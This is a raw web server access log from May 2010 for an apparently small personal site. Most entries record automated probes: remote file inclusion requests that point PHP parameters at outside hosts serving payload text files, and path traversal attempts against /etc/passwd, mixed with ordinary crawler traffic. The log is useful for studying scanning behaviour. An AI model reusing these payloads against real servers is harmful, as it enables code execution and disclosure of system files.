205.234.232.151 - - [03/May/2010:00:10:04 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.unixon-stats.co.cc/extras/idxx.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
205.234.232.151 - - [03/May/2010:00:10:04 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.unixon-stats.co.cc/extras/idxx.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
205.234.232.151 - - [03/May/2010:00:10:04 -0500] "GET /logs/access_log.1270684800%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.unixon-stats.co.cc/extras/idxx.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
205.234.232.151 - - [03/May/2010:00:10:05 -0500] "GET /logs/access_log.1270684800/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.unixon-stats.co.cc/extras/id.txt??? HTTP/1.1" 404 363 "-""libwww-perl/5.831"
205.234.232.151 - - [03/May/2010:00:10:05 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.unixon-stats.co.cc/extras/id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.831"
205.234.232.151 - - [03/May/2010:00:10:05 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.unixon-stats.co.cc/extras/id.txt??? HTTP/1.1" 404 341 "-""libwww-perl/5.831"
205.234.232.151 - - [03/May/2010:00:10:06 -0500] "GET /logs/access_log.1268611200/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.unixon-stats.co.cc/extras/id.txt??? HTTP/1.1" 404 363 "-""libwww-perl/5.831"
205.234.232.151 - - [03/May/2010:00:10:21 -0500] "GET /logs/access_log.1268611200%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.unixon-stats.co.cc/extras/idxx.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
121.190.102.21 - - [03/May/2010:00:10:26 -0500] "GET /help.php?css_path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
121.190.102.21 - - [03/May/2010:00:10:26 -0500] "GET /logs/access_log.1263168000/help.php?css_path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
121.190.102.21 - - [03/May/2010:00:10:26 -0500] "GET /logs/access_log.1263772800/help.php?css_path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
121.190.102.21 - - [03/May/2010:00:10:26 -0500] "GET /logs/help.php?css_path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
205.234.232.151 - - [03/May/2010:00:10:36 -0500] "GET /logs/access_log.1268611200%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.unixon-stats.co.cc/extras/idxx.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
205.234.232.151 - - [03/May/2010:00:11:14 -0500] "GET /logs/access_log.1270684800/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.unixon-stats.co.cc/extras/idxx.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
205.234.232.151 - - [03/May/2010:00:11:23 -0500] "GET /logs/access_log.1270684800/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.unixon-stats.co.cc/extras/idxx.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
205.234.232.151 - - [03/May/2010:00:11:45 -0500] "GET /logs/access_log.1268611200/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.unixon-stats.co.cc/extras/idxx.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
205.234.232.151 - - [03/May/2010:00:11:55 -0500] "GET /logs/access_log.1268611200/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.unixon-stats.co.cc/extras/idxx.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
68.118.113.18 - - [03/May/2010:00:12:16 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://www.google.com/m/search?site=images&source=mog&hl=en&gl=us&client=safari&q=Bert%20Grimm""Mozilla/5.0 (iPod; U; CPU iPhone OS 3_1_3 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7E18 Safari/528.16"
114.108.151.149 - - [03/May/2010:00:12:27 -0500] "GET /logs/access_log.1266364800/?INCLUDE_FOLDER=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
114.108.151.149 - - [03/May/2010:00:12:27 -0500] "GET /?INCLUDE_FOLDER=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
114.108.151.149 - - [03/May/2010:00:12:27 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 200 4114 "-""Mozilla/5.0"
205.234.232.151 - - [03/May/2010:00:13:03 -0500] "GET /logs/access_log.1266192000/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.unixon-stats.co.cc/extras/idxx.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
205.234.232.151 - - [03/May/2010:00:13:09 -0500] "GET /logs/access_log.1264723200/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.unixon-stats.co.cc/extras/idxx.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
205.234.232.151 - - [03/May/2010:00:13:13 -0500] "GET /logs/access_log.1266192000/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.unixon-stats.co.cc/extras/idxx.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
205.234.232.151 - - [03/May/2010:00:13:17 -0500] "GET /logs/access_log.1264723200/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.unixon-stats.co.cc/extras/idxx.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
118.217.216.132 - - [03/May/2010:00:16:08 -0500] "GET /logs/access_log.1264809600/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://incesp.com/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
118.217.216.132 - - [03/May/2010:00:16:08 -0500] "GET /logs/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://incesp.com/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
118.217.216.132 - - [03/May/2010:00:16:08 -0500] "GET /include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://incesp.com/id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
67.195.112.180 - - [03/May/2010:00:18:30 -0500] "GET /logs/access_log.1186790400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
118.217.216.132 - - [03/May/2010:00:21:24 -0500] "GET /include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://incesp.com/id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
118.217.216.132 - - [03/May/2010:00:21:24 -0500] "GET /logs/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://incesp.com/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
118.217.216.132 - - [03/May/2010:00:21:24 -0500] "GET /logs/access_log.1264809600/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://incesp.com/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
118.217.216.132 - - [03/May/2010:00:21:30 -0500] "GET /include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://incesp.com/id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
118.217.216.132 - - [03/May/2010:00:21:30 -0500] "GET /logs/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://incesp.com/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
118.217.216.132 - - [03/May/2010:00:21:30 -0500] "GET /logs/access_log.1264809600/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://incesp.com/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
118.217.216.132 - - [03/May/2010:00:22:20 -0500] "GET /include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://incesp.com/id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
118.217.216.132 - - [03/May/2010:00:22:20 -0500] "GET /logs/access_log.1264809600/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://incesp.com/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
118.217.216.132 - - [03/May/2010:00:22:20 -0500] "GET /logs/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://incesp.com/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
66.235.124.132 - - [03/May/2010:00:24:56 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""-"
66.235.124.132 - - [03/May/2010:00:24:56 -0500] "GET /costume/ HTTP/1.1" 200 640 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11"
87.250.255.243 - - [03/May/2010:00:27:56 -0500] "GET /logs/access_log.1238889600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
204.236.235.245 - - [03/May/2010:00:30:15 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.0" 200 3085 "-""ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)"
69.175.26.98 - - [03/May/2010:00:32:21 -0500] "GET /logs//new-visitor.inc.php?lvc_include_dir=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 309 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
69.175.26.98 - - [03/May/2010:00:32:21 -0500] "GET //new-visitor.inc.php?lvc_include_dir=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 304 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
213.175.223.80 - - [03/May/2010:00:33:17 -0500] "GET /logs//new-visitor.inc.php?lvc_include_dir=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 309 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
213.175.223.80 - - [03/May/2010:00:33:18 -0500] "GET //new-visitor.inc.php?lvc_include_dir=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 304 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.160.224.208 - - [03/May/2010:00:33:44 -0500] "GET /logs//new-visitor.inc.php?lvc_include_dir=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 309 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
195.160.224.208 - - [03/May/2010:00:33:44 -0500] "GET //new-visitor.inc.php?lvc_include_dir=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 304 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
83.103.70.86 - - [03/May/2010:00:34:02 -0500] "GET /logs//new-visitor.inc.php?lvc_include_dir=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 309 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
83.103.70.86 - - [03/May/2010:00:34:02 -0500] "GET //new-visitor.inc.php?lvc_include_dir=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 304 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
213.175.223.80 - - [03/May/2010:00:34:56 -0500] "GET /logs//_functions.php?prefix=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 304 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
213.175.223.80 - - [03/May/2010:00:34:57 -0500] "GET //_functions.php?prefix=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
83.103.70.86 - - [03/May/2010:00:36:18 -0500] "GET /logs//_functions.php?prefix=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 304 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
83.103.70.86 - - [03/May/2010:00:36:19 -0500] "GET //_functions.php?prefix=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
118.217.216.132 - - [03/May/2010:00:36:33 -0500] "GET /logs/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://incesp.com/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
118.217.216.132 - - [03/May/2010:00:36:33 -0500] "GET /include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://incesp.com/id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
118.217.216.132 - - [03/May/2010:00:36:33 -0500] "GET /logs/access_log.1264809600/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://incesp.com/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
195.160.224.208 - - [03/May/2010:00:37:51 -0500] "GET /logs//_functions.php?prefix=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 304 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
195.160.224.208 - - [03/May/2010:00:37:57 -0500] "GET //_functions.php?prefix=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
114.108.151.149 - - [03/May/2010:00:40:09 -0500] "GET //common/db.php?commonpath=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
114.108.151.149 - - [03/May/2010:00:40:09 -0500] "GET /logs/access_log.1270684800//common/db.php?commonpath=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
114.108.151.149 - - [03/May/2010:00:40:09 -0500] "GET /logs//common/db.php?commonpath=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
114.108.151.149 - - [03/May/2010:00:40:21 -0500] "GET //common/db.php?commonpath=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
114.108.151.149 - - [03/May/2010:00:40:21 -0500] "GET /logs/access_log.1270684800//common/db.php?commonpath=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
114.108.151.149 - - [03/May/2010:00:40:21 -0500] "GET /logs//common/db.php?commonpath=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
118.217.216.132 - - [03/May/2010:00:40:35 -0500] "GET /logs/access_log.1264809600/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://incesp.com/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
118.217.216.132 - - [03/May/2010:00:40:35 -0500] "GET /include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://incesp.com/id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
118.217.216.132 - - [03/May/2010:00:40:36 -0500] "GET /logs/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://incesp.com/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
118.217.216.132 - - [03/May/2010:00:41:00 -0500] "GET /include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://incesp.com/id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
118.217.216.132 - - [03/May/2010:00:41:00 -0500] "GET /logs/access_log.1264809600/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://incesp.com/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
118.217.216.132 - - [03/May/2010:00:41:00 -0500] "GET /logs/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://incesp.com/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
118.217.216.132 - - [03/May/2010:00:42:05 -0500] "GET /logs/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://incesp.com/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
118.217.216.132 - - [03/May/2010:00:42:05 -0500] "GET /include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://incesp.com/id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
118.217.216.132 - - [03/May/2010:00:42:05 -0500] "GET /logs/access_log.1264809600/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://incesp.com/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
67.195.112.180 - - [03/May/2010:00:45:26 -0500] "GET /logs/access_log.1172275200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
205.234.252.102 - - [03/May/2010:00:46:53 -0500] "GET //administrator/components/com_universal/includes/config/config.html.php?mosConfig_absolute_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 355 "-""Mozilla/5.0"
205.234.252.102 - - [03/May/2010:00:46:53 -0500] "GET /logs//administrator/components/com_universal/includes/config/config.html.php?mosConfig_absolute_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
114.108.151.149 - - [03/May/2010:00:46:55 -0500] "GET /logs//common/db.php?commonpath=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
114.108.151.149 - - [03/May/2010:00:46:55 -0500] "GET /logs/access_log.1270684800%20%20//common/db.php?commonpath=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
114.108.151.149 - - [03/May/2010:00:46:55 -0500] "GET //common/db.php?commonpath=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
205.234.252.102 - - [03/May/2010:00:46:58 -0500] "GET /logs/access_log.1270684800//administrator/components/com_universal/includes/config/config.html.php?mosConfig_absolute_path=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 382 "-""Mozilla/5.0"
204.236.235.245 - - [03/May/2010:00:48:29 -0500] "GET /logs/access_log.1212278400 HTTP/1.0" 404 298 "-""ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)"
114.108.151.149 - - [03/May/2010:00:52:55 -0500] "GET //common/db.php?commonpath=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
114.108.151.149 - - [03/May/2010:00:52:55 -0500] "GET /logs//common/db.php?commonpath=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
114.108.151.149 - - [03/May/2010:00:52:55 -0500] "GET /logs/access_log.1219795200%20%20//common/db.php?commonpath=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
114.108.151.149 - - [03/May/2010:00:53:44 -0500] "GET /logs//common/db.php?commonpath=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
114.108.151.149 - - [03/May/2010:00:53:44 -0500] "GET /logs/access_log.1219795200%20%20//common/db.php?commonpath=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
114.108.151.149 - - [03/May/2010:00:53:45 -0500] "GET //common/db.php?commonpath=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
213.175.223.80 - - [03/May/2010:00:53:58 -0500] "GET /logs//ashnews.php?pathtoashnews=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
213.175.223.80 - - [03/May/2010:00:53:58 -0500] "GET //ashnews.php?pathtoashnews=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
216.129.119.42 - - [03/May/2010:00:54:01 -0500] "GET /logs/access_log.1252368000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
83.103.70.86 - - [03/May/2010:00:54:52 -0500] "GET /logs//ashnews.php?pathtoashnews=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
83.103.70.86 - - [03/May/2010:00:54:52 -0500] "GET //ashnews.php?pathtoashnews=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.160.224.208 - - [03/May/2010:01:07:02 -0500] "GET /logs//ashnews.php?pathtoashnews=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
195.160.224.208 - - [03/May/2010:01:07:02 -0500] "GET //ashnews.php?pathtoashnews=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
220.80.108.70 - - [03/May/2010:01:08:25 -0500] "GET /logs/access_log.1264464000//common/db.php?commonpath=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
220.80.108.70 - - [03/May/2010:01:08:25 -0500] "GET //common/db.php?commonpath=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
220.80.108.70 - - [03/May/2010:01:08:26 -0500] "GET /logs//common/db.php?commonpath=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
220.80.108.70 - - [03/May/2010:01:08:32 -0500] "GET /logs/access_log.1266019200//common/db.php?commonpath=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
94.23.15.24 - - [03/May/2010:01:10:06 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 200 1005 "-""Mozilla/5.0"
94.23.15.24 - - [03/May/2010:01:10:06 -0500] "GET /logs/access_log.1264723200////?_SERVER[DOCUMENT_ROOT]=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 314 "-""Mozilla/5.0"
94.23.15.24 - - [03/May/2010:01:10:07 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 200 4121 "-""Mozilla/5.0"
84.40.30.37 - - [03/May/2010:01:13:44 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 335 "-""Mozilla/5.0"
84.40.30.37 - - [03/May/2010:01:13:44 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 340 "-""Mozilla/5.0"
84.40.30.37 - - [03/May/2010:01:13:44 -0500] "GET /logs/access_log.1268956800%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 364 "-""Mozilla/5.0"
84.40.30.37 - - [03/May/2010:01:13:58 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 335 "-""Mozilla/5.0"
84.40.30.37 - - [03/May/2010:01:13:58 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 340 "-""Mozilla/5.0"
84.40.30.37 - - [03/May/2010:01:13:58 -0500] "GET /logs/access_log.1268956800%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 364 "-""Mozilla/5.0"
207.46.199.191 - - [03/May/2010:01:14:01 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
84.40.30.37 - - [03/May/2010:01:15:45 -0500] "GET /logs/access_log.1268611200%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 364 "-""Mozilla/5.0"
84.40.30.37 - - [03/May/2010:01:15:50 -0500] "GET /logs/access_log.1268611200%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 364 "-""Mozilla/5.0"
75.136.121.230 - - [03/May/2010:01:15:54 -0500] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
75.136.121.230 - - [03/May/2010:01:15:54 -0500] "GET /logs/access_log.1270598400/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt?? HTTP/1.1" 404 384 "-""Mozilla/5.0"
75.136.121.230 - - [03/May/2010:01:15:54 -0500] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
124.49.100.254 - - [03/May/2010:01:16:36 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
124.49.100.254 - - [03/May/2010:01:16:36 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
124.49.100.254 - - [03/May/2010:01:16:36 -0500] "GET /logs/access_log.1265500800//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 355 "-""Mozilla/5.0"
124.49.100.254 - - [03/May/2010:01:16:48 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
124.49.100.254 - - [03/May/2010:01:16:48 -0500] "GET /logs/access_log.1265500800//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 355 "-""Mozilla/5.0"
